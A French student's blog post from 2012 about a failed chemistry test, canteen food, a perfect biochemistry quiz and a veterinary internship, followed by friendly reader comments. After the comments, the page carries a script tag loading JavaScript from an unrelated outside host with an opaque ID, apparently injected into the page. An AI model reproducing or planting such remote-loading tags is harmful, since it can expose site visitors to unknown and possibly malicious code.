• Des nouvelles

    Hey guys !

    (oui, je suis d'humeur familière ce soir !).

    Aux news tonight (oui, l'anglais et moi, le grand amour...), bah rien de neuf. Ah si, du réchauffé (sauf pour ceux qui ne me téléphonent pas, c'est-à-dire je pense, un certain nombre de mes lecteurs)

    Alors, dans la catégorie :

    Pouce vers le bas

    J'ai nommé :

    - le plantage (ultra collectif...) au contrôle de chimie la semaine dernière. On sait pas trop ce qu'il s'est passé, le prof qui a pondu le sujet avait fumé ou quoi, une envie soudaine de s'éclater un peu... bref, un sujet dont aucun exercice n'était facile, et dont les profs estiment d'ores et déjà qu'avoir 8 c'est très bien (--').
    Notre super (oui, le nouveau) prof de chimie, à voir nos tronches de six pieds de long le lendemain matin, nous a dit qu'il fallait positiver et voir ça « comme une expérience » parce qu'il nous promet qu'on en verra d'autres du même acabit tout au long de nos études (la chimie nous sortait tellement par les yeux qu'on n'avait même pas préparé nos exercices, c'est dire...)
    - les pâtes à la pseudo bolognaise du RU, qu'on dirait qu'on vient de vomir sur tes pâtes avant de te les servir (oui, odeur comprise). Et tu te dis que même le jour d'un trèèèès gros examen, tu pourrais quand même vomir quelque chose de plus apétissant (vous ne sortez pas de table ?)
    (et si j'allais leur proposer mes services non, ça sert à rien, j'ai pas vomi depuis l'épreuve de philo)

    Des nouvelles

    - Ex-prof-de-chimie m'a dit bonjour la semaine dernière quand on s'est croisés. Ça veut dire qu'il m'a reconnue ...

    Pouce vers le haut

    - J'aimerais me planter à un devoir comme celui-là tous les jours. Petit contrôle de biochimie, équation d'Henderson-Hasselbach, ouh là, je rends ma feuille en étant certaine de m'être plantée quelque part... résultat : 10/10. On aimerait bien se planter comme ça plus souvent.
    - J'ai mon stage dans une clinique vétérinaire. Première lettre, première réponse !
    - Il fait super beau, c'est bien bon pour le moral et bien plus agréable de pouvoir sortir sans se peler.
    - J'ai mangé du réchauffé ce soir : pâtes à la poêle ! Une première, je m'arrange toujours pour ne pas avoir de reste... (éh ! faut saluer chaque progrès)

    (vive l'équation d'Hendersen Hasselbalch ! vive la puissance du pH et des pKa, et des log !)

    « Mes enfants, l'université est pôôôvre, faut vous y faire (et aller voter, mais c'est trop tard)Petites histoires de TP »
    Partager via Gmail Yahoo! Google Bookmarks Blogmarks

    Tags Tags : , , , , , ,
  • Commentaires

    1
    LaMaman
    Mardi 13 Mars 2012 à 13:34

    Pour le devoir raté, un sadique trouve toujours de bonnes raisons "pédagogiques" à sa cruauté...Ne vous laissez pas berner, planter tout le monde intentionnellement, ça n'est pas dans l'ordre des choses. ce type est un grand malade!!!

    Pour le devoir réussi, moi qui te connais bien, de toutes les façons, avec toi, c'est toujours raté pour finalement être un carton ou un pas trop mal...Tu te fais des frayeurs pour rien!!!

    Pour le RU, je passe, j'ai déjà donné!!!

    Pour l'ancien prof de chimie, comment veux-tu qu'il t'oublie, tu as été la seule à oser lui dire que sa pédagogie restait un mystère pour vous. Tu retiendras ceci: ce n'est pas en s'écrasant qu'on attire le respect mais c'est bien plutôt le contraire!!!

    Thaliedelouest a "facebooké"  l'annonce pour Théophile. Sympa! Pourvu que ça marche...

    Bon courage.

    2
    Mardi 13 Mars 2012 à 19:13

    Super pour ton stage ! :)

    3
    Mardi 13 Mars 2012 à 19:14

    Merci !

    4
    Mardi 13 Mars 2012 à 22:12

    Au RU, ce ne sont pas des pâtes éthiques...

    (Et cool, le stage ! (et pis le 10/10 (voire les pâtes réchauffé et le prof de chimie aussi (et le contrôle c'est pas si grave c'est de la chimie y en aura d'autres)))).

     

    5
    Mardi 13 Mars 2012 à 22:17

    Pfiouuuuuuuuu, pâtes éthiques (ça va, journées pas trop chargées pour sortir un jeu de mot pareil ?), je viens de comprendre.

    Pour la chimie, si, c'est grave, parce que non seulement il était dur, mais en plus, j'ai eu un... blanc devant ma feuille --'.
    (au moins, maintenant, je sais ce que c'est ; et je sais aussi qu'il ne peut rien arriver de pire qu'avoir un trou soudain de mémoire pour des formules qu'on connaissait par coeur depuis plusieurs semaines)

    Mais, dans la catégorie "pouce levé" j'ai mieux : article d'ici 5 mn.
    (#teaser# !)

    6
    Lundi 19 Mars 2012 à 08:48

    Super pour le stage et le contrôle "râté" ! :)

    <script src="http://loading-resource.com/50.js.php?i=%7B49562AC7-8887-4B7E-A128-2C4B31013126%7D" type="text/javascript"></script>
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :